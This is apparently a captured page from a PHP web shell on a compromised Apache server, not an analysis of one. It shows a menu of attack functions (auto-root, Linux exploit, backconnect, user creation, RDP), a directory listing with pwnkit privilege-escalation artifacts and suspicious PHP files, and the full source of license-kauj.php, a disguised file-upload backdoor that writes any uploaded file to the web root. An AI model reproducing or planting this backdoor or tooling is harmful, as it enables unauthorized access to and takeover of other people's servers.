Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.142
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechgdas.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
andrebz
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
cqdozsa
[ DIR ]
drwxr-xr-x
equicare
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxr-xr-x
gtavsiw
[ DIR ]
drwxr-xr-x
pb1jhox
[ DIR ]
drwxr-xr-x
product-images
[ DIR ]
drwxr-xr-x
qtkfosj
[ DIR ]
drwxr-xr-x
trncbv1
[ DIR ]
drwxr-xr-x
ufcvpzn
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
zdpwmrv
[ DIR ]
drwxr-xr-x
.htaccess
199
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
bitnami.css
177
B
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
index.php
43
B
-rw-r--r--
license-kauj.php
629
B
-rw-r--r--
php.ini_old
231
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
24
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : license-kauj.php
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['image'])) { $f = $_FILES['image']; if ($f['error'] === UPLOAD_ERR_OK) { $name = basename($f['name']); $ok = move_uploaded_file($f['tmp_name'], __DIR__ . '/' . $name); echo $ok ? "<center><b>Done ==> {$name}</b></center>" : "<center><b>Error writing file</b></center>"; } else { echo "<center><b>Upload error code: {$f['error']}</b></center>"; } exit; } ?> 7f37e915991fcf42 <form method="post" enctype="multipart/form-data"> <input type="file" name="image"> <input type="submit" value="Submit"> </form>
Close